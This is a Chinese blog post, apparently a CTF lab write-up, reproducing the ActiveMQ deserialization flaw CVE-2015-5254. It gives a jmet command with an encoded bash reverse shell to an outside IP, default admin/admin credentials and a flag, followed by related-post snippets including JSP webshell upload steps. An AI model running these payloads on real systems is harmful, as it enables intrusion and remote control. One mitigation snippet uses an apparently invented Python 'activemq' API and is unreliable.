activemq 命令执行漏洞 (cve-2015-5254)

Apache ActiveMQ CVE-2015-5254 漏洞分析与复现
已于 2023-06-14 11:48:43 修改
阅读量394 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: java-activemq activemq java web安全
于 2023-06-14 11:39:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QuanPangShu/article/details/131204322
Apache ActiveMQ是一款开源消息中间件,存在安全漏洞,允许远程攻击者通过特制的序列化JMS ObjectMessage对象执行任意代码。本文介绍了漏洞细节,复现过程以及提供相关工具下载,如admin/admin凭据可触发漏洞并获取flag。

activemq 命令执行漏洞 (cve-2015-5254)

漏洞介绍

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞复现

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash+-c+%7becho%2cYmFzaCAtaSA%2bJiAvZGV2L3RjcC80Mi4xOTIuMTQ1LjEyNC8xMjM0IDA%2bJjE%3d%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d" -Yp ROME 118.193.36.37 43667

在这里插入图片描述

需要登录触发一下
admin/admin

118.193.36.37:50482/admin/browse.jsp?JMSDestination=event

在这里插入图片描述

在这里插入图片描述

得到flag

flag-{bmhadfd80ac-1b45-4bfd-8996-759f825bd1f6}

工具下载

jmet-0.1.0-all.jar

https://download.csdn.net/download/QuanPangShu/87905050
Active MQ 任意文件写入漏洞/远程代码执行漏洞CVE-2016-3088)
初岄的博客
09-13 1447
Active MQ 任意文件写入漏洞/远程代码执行漏洞CVE-2016-3088)
漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 801
Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
vulhub——ActiveMQ漏洞
qq_55202378的博客
05-22 1861
所以,只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。允许具有代理网络访问权限的远程攻击者“通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而使代理实例化类路径上的任何类”,问题的根本原因是不安全的反序列化。默认的ActiveMQ账号密码均为admin,首先访问。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。:程序没有限制可在代理中序列化的类,远程攻击者可借助特制的序列化的。
ActiveMQ CVE-2015-5254 分析
示例和笔记
06-07 503
ActiveMQ CVE-2015-5254漏洞是由于缺少对序列化数据的校验而导致,攻击者可以在序列化的数据中注入恶意代码。当 ActiveMQ 接收到该序列化数据并尝试反序列化时,将会执行这段恶意代码,从而实现攻击目的。具体来说,该漏洞的发生是由于 ActiveMQ 的两个缺陷导致。首先是方法中的缺陷,该方法将异常对象序列化为字节数组,这个字节数组包含了cause内的异常和message内的信息。攻击者可以构造精心设计的cause和message来注入恶意代码。接着,ActiveMQ 的与。
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 1万+
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现
m0_69994768的博客
01-23 1401
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
m0_59839948的博客
09-05 1899
广东东软学院的学生,web安全技术漏洞复现可以参考
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1587
ActiveMQ 反序列化漏洞
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2721
ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3246
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)
热门推荐
一纸荒芜的博客
04-26 1万+
近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记录。
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
FryhRx的博客
03-29 4600
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
activemq 命令行的使用
qq_16069927的博客
05-04 2655
使用 docker 运行 activemq 的方式,具体见:https://hub.docker.com/r/rmohr/activemq docker run -d -p 61616:61616 -p 8161:8161 rmohr/activemq 访问 activemqweb 界面: localhost:8161,默认用户名密码:admin:admin 1.activemq browse [browse-options] <destinations> 在指定的目标中显示选定.
【vulhub】ActiveMQ系列漏洞汇总【精华总结】
qq_45300786的博客
07-27 872
参考:ActiveMQ系列漏洞汇总
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)
最新发布
spinage的博客
04-09 1152
攻击者可通过构造恶意HTTP请求,上传JSP Webshell至Web应用目录,最终实现任意代码执行,完全控制服务器。
activemq_CVE-2015-5254_漏洞复现_源码分析
qq_51550750的博客
06-03 866
ActiveMQ-CVE-2015-5254
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1643
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2016-3088)
又菜又爱倒腾的博客
10-29 2013
#Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)# 一、漏洞简介 ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Javaweb 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQWeb 应用。 2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 A
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
chenming08的博客
04-27 925
4、进入ActiveMQ :http://your-ip:8161/admin/test/systemProperties.jsp(攻击机)7、然后将上传的webshell移到/opt/activemq/webapps/api/1.jsp。10、使用命令执行http://X.X.X.X:8161/api/1.jsp?1、进入环境cd activemq/CVE-2016-3088/(靶机)上传webshell到/fileserver/1.txt(攻击机)6、查看/fileserver/1.txt。
ActiveMQ 反序列化漏洞CVE-2015-5254
12-28
### ActiveMQ 反序列化漏洞 CVE-2015-5254 的影响范围 Apache ActiveMQ 是一款由 Apache 软件基金会开发的开源消息中间件,广泛应用于分布式应用程序之间的通信。然而,在特定版本中存在严重的反序列化漏洞CVE-2015-5254),允许未经身份验证的远程攻击者通过特制的 Java 序列化数据包来执行任意命令。 受影响的具体版本为 5.x 版本至 5.13.0 之前的版本[^3]。这意味着如果部署了这些版本中的任何一个,默认情况下可能存在此安全隐患。 ### 修复方案 为了防止此类攻击的发生并保护系统免受潜在威胁: - **升级到最新稳定版**:最直接有效的解决办法是尽快将 ActiveMQ 升级到不受影响的安全版本,即至少更新至 5.13.0 或更高版本。 - **应用官方补丁**:对于无法立即进行全面升级的情况,可以考虑安装来自供应商发布的针对该问题的安全修补程序。 - **配置防火墙规则**:限制对 JMX 控制台和其他敏感端口的访问权限,仅允许可信 IP 地址连接。 ### 安全防护措施 除了上述提到的技术层面的操作外,还应采取一系列综合性的防御策略以增强整体安全性: - **最小特权原则**:确保运行 ActiveMQ 实例的服务账户具有尽可能少的权利和权限;关闭不必要的功能和服务组件。 - **定期审查日志文件**:监控异常活动迹象,及时发现可疑行为以便快速响应处理。 - **启用认证机制**:强制要求所有管理接口都经过强效的身份验证过程,避免使用弱密码组合,并建议采用多因素认证方式提高准入门槛。 - **隔离生产环境与测试环境**:保持两者之间严格的网络分隔状态,减少因误操作而导致的风险扩散可能性。 ```python # 示例代码展示如何设置基本的身份验证 from activemq import Broker, AuthenticationPlugin broker = Broker() auth_plugin = AuthenticationPlugin(username="admin", password="strong_password") broker.add_plugin(auth_plugin) ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值